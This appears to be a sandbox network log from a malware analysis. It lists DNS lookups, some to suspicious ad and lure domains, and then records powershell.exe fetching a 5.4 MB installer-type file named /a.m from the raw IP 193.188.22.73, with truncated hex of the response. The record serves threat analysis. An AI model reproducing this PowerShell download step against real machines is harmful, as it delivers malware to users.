                                                                                                                                                                                            Nov 18, 2024 21:00:07.524063110 CET1.1.1.1192.168.2.160xd759No error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.525119066 CET1.1.1.1192.168.2.160x25adNo error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.528006077 CET1.1.1.1192.168.2.160x8bc0No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.528006077 CET1.1.1.1192.168.2.160x8bc0No error (0)platform.twitter.map.fastly.net146.75.120.157A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.528146029 CET1.1.1.1192.168.2.160xe558No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.616591930 CET1.1.1.1192.168.2.160xac26No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.616591930 CET1.1.1.1192.168.2.160xac26No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.618968010 CET1.1.1.1192.168.2.160xd60No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.618968010 CET1.1.1.1192.168.2.160xd60No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.618968010 CET1.1.1.1192.168.2.160xd60No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.550967932 CET1.1.1.1192.168.2.160xa371No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.550967932 CET1.1.1.1192.168.2.160xa371No error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.550967932 CET1.1.1.1192.168.2.160xa371No error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.550967932 CET1.1.1.1192.168.2.160xa371No error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.550967932 CET1.1.1.1192.168.2.160xa371No error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.551148891 CET1.1.1.1192.168.2.160x12a3No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.556778908 CET1.1.1.1192.168.2.160x4e41No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.556778908 CET1.1.1.1192.168.2.160x4e41No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.556778908 CET1.1.1.1192.168.2.160x4e41No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.556778908 CET1.1.1.1192.168.2.160x4e41No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.556778908 CET1.1.1.1192.168.2.160x4e41No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.556946993 CET1.1.1.1192.168.2.160xc7ddNo error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.686371088 CET1.1.1.1192.168.2.160xac50No error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.686371088 CET1.1.1.1192.168.2.160xac50No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.686371088 CET1.1.1.1192.168.2.160xac50No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.686371088 CET1.1.1.1192.168.2.160xac50No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.686371088 CET1.1.1.1192.168.2.160xac50No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.688106060 CET1.1.1.1192.168.2.160x54abNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.728984118 CET1.1.1.1192.168.2.160xdebeNo error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.728998899 CET1.1.1.1192.168.2.160xde3bNo error (0)googleads.g.doubleclick.net142.250.185.194A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.936124086 CET1.1.1.1192.168.2.160xfdccNo error (0)stats.g.doubleclick.net173.194.76.157A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.936124086 CET1.1.1.1192.168.2.160xfdccNo error (0)stats.g.doubleclick.net173.194.76.156A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.936124086 CET1.1.1.1192.168.2.160xfdccNo error (0)stats.g.doubleclick.net173.194.76.155A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.936124086 CET1.1.1.1192.168.2.160xfdccNo error (0)stats.g.doubleclick.net173.194.76.154A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.017232895 CET1.1.1.1192.168.2.160x8e56No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.017232895 CET1.1.1.1192.168.2.160x8e56No error (0)platform.twitter.map.fastly.net146.75.120.157A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.018102884 CET1.1.1.1192.168.2.160x29e1No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.055097103 CET1.1.1.1192.168.2.160xb554No error (0)t.co162.159.140.229A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.178916931 CET1.1.1.1192.168.2.160x17faNo error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.178916931 CET1.1.1.1192.168.2.160x17faNo error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.178916931 CET1.1.1.1192.168.2.160x17faNo error (0)s.twitter.com104.244.42.67A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.179547071 CET1.1.1.1192.168.2.160x7098No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.179547071 CET1.1.1.1192.168.2.160x7098No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.351475000 CET1.1.1.1192.168.2.160x626bNo error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.355123043 CET1.1.1.1192.168.2.160xcda0No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.355123043 CET1.1.1.1192.168.2.160xcda0No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.355123043 CET1.1.1.1192.168.2.160xcda0No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.355123043 CET1.1.1.1192.168.2.160xcda0No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.355123043 CET1.1.1.1192.168.2.160xcda0No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.366360903 CET1.1.1.1192.168.2.160x9aeeNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.366360903 CET1.1.1.1192.168.2.160x9aeeNo error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.366506100 CET1.1.1.1192.168.2.160xa680No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.366506100 CET1.1.1.1192.168.2.160xa680No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.366506100 CET1.1.1.1192.168.2.160xa680No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.439232111 CET1.1.1.1192.168.2.160xa273No error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.439232111 CET1.1.1.1192.168.2.160xa273No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.439232111 CET1.1.1.1192.168.2.160xa273No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.439232111 CET1.1.1.1192.168.2.160xa273No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.439232111 CET1.1.1.1192.168.2.160xa273No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.441206932 CET1.1.1.1192.168.2.160xcdf2No error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.462513924 CET1.1.1.1192.168.2.160x4a31No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.462513924 CET1.1.1.1192.168.2.160x4a31No error (0)analytics-alv.google.com216.239.34.181A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.462513924 CET1.1.1.1192.168.2.160x4a31No error (0)analytics-alv.google.com216.239.36.181A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.462513924 CET1.1.1.1192.168.2.160x4a31No error (0)analytics-alv.google.com216.239.38.181A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.462513924 CET1.1.1.1192.168.2.160x4a31No error (0)analytics-alv.google.com216.239.32.181A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.462692022 CET1.1.1.1192.168.2.160x5520No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.529007912 CET1.1.1.1192.168.2.160x13eNo error (0)cta.berlmember.com103.52.144.214A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.886070967 CET1.1.1.1192.168.2.160x3a61No error (0)t.co162.159.140.229A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.931981087 CET1.1.1.1192.168.2.160x3b1cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.932126045 CET1.1.1.1192.168.2.160x3c4fNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.936808109 CET1.1.1.1192.168.2.160x80eNo error (0)cta.berlmember.com103.52.144.214A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.066026926 CET1.1.1.1192.168.2.160x4640No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.066026926 CET1.1.1.1192.168.2.160x4640No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.066026926 CET1.1.1.1192.168.2.160x4640No error (0)s.twitter.com104.244.42.67A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.067496061 CET1.1.1.1192.168.2.160x3559No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.067496061 CET1.1.1.1192.168.2.160x3559No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.104249954 CET1.1.1.1192.168.2.160xfc23No error (0)stats.g.doubleclick.net74.125.206.157A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.104249954 CET1.1.1.1192.168.2.160xfc23No error (0)stats.g.doubleclick.net74.125.206.154A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.104249954 CET1.1.1.1192.168.2.160xfc23No error (0)stats.g.doubleclick.net74.125.206.156A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.104249954 CET1.1.1.1192.168.2.160xfc23No error (0)stats.g.doubleclick.net74.125.206.155A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.240206003 CET1.1.1.1192.168.2.160x3f3bNo error (0)w3-reporting-nel.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.240206003 CET1.1.1.1192.168.2.160x3f3bNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.240206003 CET1.1.1.1192.168.2.160x3f3bNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.240206003 CET1.1.1.1192.168.2.160x3f3bNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.240206003 CET1.1.1.1192.168.2.160x3f3bNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.242805004 CET1.1.1.1192.168.2.160x1a37No error (0)w3-reporting-nel.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.392174006 CET1.1.1.1192.168.2.160xea91No error (0)premiumserviceads.com94.141.120.12A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.478879929 CET1.1.1.1192.168.2.160x3e01No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.478879929 CET1.1.1.1192.168.2.160x3e01No error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.478933096 CET1.1.1.1192.168.2.160x4028No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.478933096 CET1.1.1.1192.168.2.160x4028No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.478933096 CET1.1.1.1192.168.2.160x4028No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:11.786149025 CET1.1.1.1192.168.2.160xdf3eNo error (0)bcbshieldn.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:11.787276983 CET1.1.1.1192.168.2.160xd24aNo error (0)bcbshieldn.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:11.787276983 CET1.1.1.1192.168.2.160xd24aNo error (0)bcbshieldn.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:14.008773088 CET1.1.1.1192.168.2.160x64edNo error (0)bcbshieldn.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:14.008773088 CET1.1.1.1192.168.2.160x64edNo error (0)bcbshieldn.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:14.177131891 CET1.1.1.1192.168.2.160xfd8No error (0)bcbshieldn.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:14.198885918 CET1.1.1.1192.168.2.160x6d15No error (0)google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:14.199122906 CET1.1.1.1192.168.2.160x42c0No error (0)google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022319078 CET1.1.1.1192.168.2.160xb6a9No error (0)analytics.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022845030 CET1.1.1.1192.168.2.160x534fNo error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:11.030277967 CET1.1.1.1192.168.2.160x5095No error (0)td.doubleclick.net142.250.186.34A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:31.227468967 CET1.1.1.1192.168.2.160xc047No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:31.227468967 CET1.1.1.1192.168.2.160xc047No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:31.227468967 CET1.1.1.1192.168.2.160xc047No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:31.227624893 CET1.1.1.1192.168.2.160x108fNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:31.227624893 CET1.1.1.1192.168.2.160x108fNo error (0)star-mini.c10r.facebook.com157.240.252.35A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:32.363596916 CET1.1.1.1192.168.2.160x1427No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:32.363596916 CET1.1.1.1192.168.2.160x1427No error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:32.363706112 CET1.1.1.1192.168.2.160xba4aNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:32.363706112 CET1.1.1.1192.168.2.160xba4aNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:32.363706112 CET1.1.1.1192.168.2.160xba4aNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.164969966.33.207.42806732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Nov 18, 2024 21:00:00.216763020 CET433OUTGET / HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Nov 18, 2024 21:00:00.936520100 CET483INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:00 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Location: https://winningwriters.com/
                                                                                                                                                                                            Content-Length: 235
                                                                                                                                                                                            Keep-Alive: timeout=2, max=100
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6e 6e 69 6e 67 77 72 69 74 65 72 73 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://winningwriters.com/">here</a>.</p></body></html>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.1649940193.188.22.73807688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Nov 18, 2024 21:01:17.267827034 CET161OUTGET /a.m HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                            Host: 193.188.22.73
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Nov 18, 2024 21:01:18.051007986 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:01:17 GMT
                                                                                                                                                                                            Content-Type: application/vnd.wolfram.mathematica.package
                                                                                                                                                                                            Content-Length: 5402624
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Last-Modified: Mon, 18 Nov 2024 18:33:40 GMT
                                                                                                                                                                                            ETag: "527000-6273427d889e4"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 00 04 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [TRUNCATED]
                                                                                                                                                                                            Data Ascii: >
                                                                                                                                                                                            Nov 18, 2024 21:01:18.051414967 CET52INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 18, 2024 21:01:18.051454067 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 18, 2024 21:01:18.052644014 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 18, 2024 21:01:18.052681923 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 18, 2024 21:01:18.056521893 CET1236INData Raw: 9b 00 00 00 9c 00 00 00 9d 00 00 00 9e 00 00 00 9f 00 00 00 a0 00 00 00 a1 00 00 00 a2 00 00 00 a3 00 00 00 a4 00 00 00 a5 00 00 00 a6 00 00 00 a7 00 00 00 a8 00 00 00 a9 00 00 00 aa 00 00 00 ab 00 00 00 ac 00 00 00 ad 00 00 00 ae 00 00 00 af 00
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 18, 2024 21:01:18.057266951 CET848INData Raw: d0 01 00 00 d1 01 00 00 d2 01 00 00 d3 01 00 00 d4 01 00 00 d5 01 00 00 d6 01 00 00 d7 01 00 00 d8 01 00 00 d9 01 00 00 da 01 00 00 db 01 00 00 dc 01 00 00 dd 01 00 00 de 01 00 00 df 01 00 00 e0 01 00 00 e1 01 00 00 e2 01 00 00 e3 01 00 00 e4 01
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 18, 2024 21:01:18.058463097 CET1236INData Raw: a4 02 00 00 a5 02 00 00 a6 02 00 00 a7 02 00 00 a8 02 00 00 a9 02 00 00 aa 02 00 00 ab 02 00 00 ac 02 00 00 ad 02 00 00 ae 02 00 00 af 02 00 00 b0 02 00 00 b1 02 00 00 b2 02 00 00 b3 02 00 00 b4 02 00 00 b5 02 00 00 b6 02 00 00 b7 02 00 00 b8 02
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            Nov 18, 2024 21:01:18.058501005 CET1236INData Raw: d9 03 00 00 da 03 00 00 db 03 00 00 dc 03 00 00 dd 03 00 00 de 03 00 00 df 03 00 00 e0 03 00 00 e1 03 00 00 e2 03 00 00 e3 03 00 00 e4 03 00 00 e5 03 00 00 e6 03 00 00 e7 03 00 00 e8 03 00 00 e9 03 00 00 ea 03 00 00 eb 03 00 00 ec 03 00 00 ed 03
